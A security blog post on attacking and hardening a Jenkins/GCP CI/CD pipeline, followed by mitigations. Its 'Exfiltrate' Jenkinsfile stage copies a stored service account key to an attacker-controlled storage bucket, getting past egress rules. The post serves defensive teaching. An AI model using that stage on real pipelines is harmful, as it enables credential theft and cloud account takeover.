CI/CD supply chain attacks for data exfiltration or cloud account takeover

The modern enterprise considers its CI/CD pipeline one of its most critical assets. However, the need to support developers in rapid tool exploration and iteration often drives devops teams to be fairly loose with repository and build controls. The great challenge of securing CI/CD lies in the nature of the beast: build systems execute arbitrary code by design, so CI/CD scripting tools grant an attacker RCE from the get-go. In this blog we examine a fairly robust architecture, how to break it, and how to further harden the design.

Our model is a security-conscious enterprise with build services hosted in its datacenter but deployments to the cloud. Initially there may be many developers with commit permissions to the repos and little control over source code or container lineage. Given the recent Docker Hub breach, the security team wants to take steps to harden the system against supply chain attacks and limit the blast radius of a compromised developer token or laptop.

The security team has implemented the following changes:

· Git hooks are required to prevent accidental credential check-ins for all repositories.

· Developers are granted wide permissions to create repositories and build in a dedicated dev build project using Cloud Build. Containers are assumed to be malicious but cordoned to their own projects or GCP build infrastructure.

· All commits to repos which can enter stage or dev environments require Dockerfiles with approved lineages (FROM <trusted whitelist>) and the approval of one or more developers to merge.

· All secrets used in build jobs are managed by the Jenkins administrators. Secrets are securely passed to the administrators who input them into Jenkins cred manager and only permit them to be read by the repos which require them.

· Network egress from build agents is locked down, whitelisting only GCP services like Storage and Container Registry.
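The lineage check in the third bullet can be sketched as a small merge-gate script. This is only an illustrative sketch; the whitelist entries and file names are assumptions, not part of the original architecture:

```shell
#!/bin/sh
# Sketch of the Dockerfile lineage gate: reject any Dockerfile whose FROM
# line references a base image outside the trusted whitelist.
# The whitelist entries below are hypothetical.
WHITELIST="gcr.io/acme-base/debian gcr.io/acme-base/golang"

check_dockerfile() {
  # Pull the image out of every FROM line (handles "FROM img AS stage"),
  # dropping any :tag suffix before comparing.
  for image in $(awk 'toupper($1) == "FROM" {print $2}' "$1" | cut -d: -f1); do
    allowed=0
    for base in $WHITELIST; do
      [ "$image" = "$base" ] && allowed=1
    done
    if [ "$allowed" -eq 0 ]; then
      echo "REJECT: $1 builds from untrusted base $image" >&2
      return 1
    fi
  done
  return 0
}
```

A pre-receive hook or a required status check on merge requests would run this over every Dockerfile touched by the diff.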

Taken together, these controls define the build and deployment architecture.

We will now break this.

Jenkinsfile Credentials Attack

Assume an attacker has compromised write permissions to a GitHub repo, either via the Docker Hub breach or via a phishing attack leading to developer laptop compromise. Our attacker wishes to escalate privilege by obtaining credentials stored by the Jenkins server.

Jenkins builds are triggered on commits to feature branches in the source repo, and Jenkins agents run the Jenkinsfile found in the repo. A reviewer is required only on merge requests, not on pushes, so a single Git credential is enough to get code execution on Jenkins. Secrets are managed with the Jenkins credentials manager. Below is a sample Jenkinsfile snippet.
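Something along these lines, with hypothetical job, image, and credential names standing in for the real ones:

```groovy
pipeline {
    agent any
    stages {
        stage('Build') {
            steps {
                sh 'docker build -t gcr.io/acme-stage/app:${GIT_COMMIT} .'
            }
        }
        stage('Push') {
            steps {
                // Long-lived service account key pulled from the Jenkins
                // credentials manager and exposed to the build shell.
                withCredentials([file(credentialsId: 'gcp-stage-sa-key',
                                      variable: 'GOOGLE_APPLICATION_CREDENTIALS')]) {
                    sh 'gcloud auth activate-service-account --key-file=$GOOGLE_APPLICATION_CREDENTIALS'
                    sh 'docker push gcr.io/acme-stage/app:${GIT_COMMIT}'
                }
            }
        }
    }
}
```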

The attacker is only interested in credentials for staging or production, having deemed the dev environments a dead end. The attacker holds only one Git credential, but the Jenkins credentials manager holds another, used to tag releases and the like. If this credential is not protected and is not a granularly scoped token, the attacker can create a commit with the compromised Jenkins Git credential and approve the merge with the compromised developer credential.

Allowing developers to design the build pipeline via a Jenkinsfile is a great benefit, but here the attacker leverages that same convenience. Even though exfiltrating to the internet at large is blocked by network egress rules, the attacker knows that the build infrastructure is likely to put artifacts in Storage Buckets, so Storage will be whitelisted. The attacker simply reads the credentials in a Jenkinsfile stage and exports them to their own Storage Bucket.
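Since the attacker controls the Jenkinsfile, the exfiltration is one added stage. A sketch, assuming the same hypothetical credential ID as above and an attacker-controlled bucket:

```groovy
stage('Exfiltrate') {
    steps {
        withCredentials([file(credentialsId: 'gcp-stage-sa-key',
                              variable: 'GOOGLE_APPLICATION_CREDENTIALS')]) {
            // Egress to arbitrary hosts is blocked, but Storage is on the
            // whitelist, so the stolen key rides out on an allowed channel.
            sh 'gsutil cp $GOOGLE_APPLICATION_CREDENTIALS gs://attacker-bucket/loot.json'
        }
    }
}
```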

Mitigation for Jenkinsfile Credentials Attack

The problem here is that the Jenkins credentials manager supplies Jenkins jobs with permanent credentials. Because a Jenkins job is low trust, every job should instead receive a fresh, short-lived credential that overwrites the stored one. Use a seed job to wrap the Jenkinsfile in a pre-Jenkinsfile step which generates a new service account key and injects only that key into the environment, then delete the key in a post-Jenkinsfile step. With gcloud, the key does not have an expiry, but with the REST API a short expiry can be set as added protection in case the post step fails to run.
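The seed-job wrapper amounts to something like the following pre/post steps (the service account name is an assumption, and this is a sketch rather than a complete seed job):

```shell
SA="builder@acme-stage.iam.gserviceaccount.com"

# Pre-Jenkinsfile: mint a fresh key for this run only.
gcloud iam service-accounts keys create /tmp/run-key.json --iam-account="$SA"
KEY_ID=$(python3 -c "import json; print(json.load(open('/tmp/run-key.json'))['private_key_id'])")
export GOOGLE_APPLICATION_CREDENTIALS=/tmp/run-key.json

# ... run the repo's Jenkinsfile stages here ...

# Post-Jenkinsfile: revoke the key even if the build failed.
gcloud iam service-accounts keys delete "$KEY_ID" --iam-account="$SA" --quiet
rm -f /tmp/run-key.json
```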

Although this reduces the utility of exporting credentials, the attacker can still use them for the duration of the build step. An even better solution is HashiCorp Vault, which provides full auditing of secret access along with advanced features like dynamic secrets and one-time-use secrets. The goal is to reach a state where the attacker can only use the credentials by causing the build to fail (by blocking re-use of run-specific creds), thus alerting administrators.
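With Vault's GCP secrets engine, for example, each run can lease a credential that expires on its own; the roleset name below is hypothetical:

```shell
# Lease a short-lived OAuth access token from Vault's GCP secrets engine.
# Every read is audited, and the token expires on its own lease schedule.
vault read -field=token gcp/token/jenkins-stage-roleset
```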

Another way to block exfiltration is to extend Google Private Access to the datacenter; see my blog on using GCP Service Controls to prevent data exfiltration.





Kesten Broughton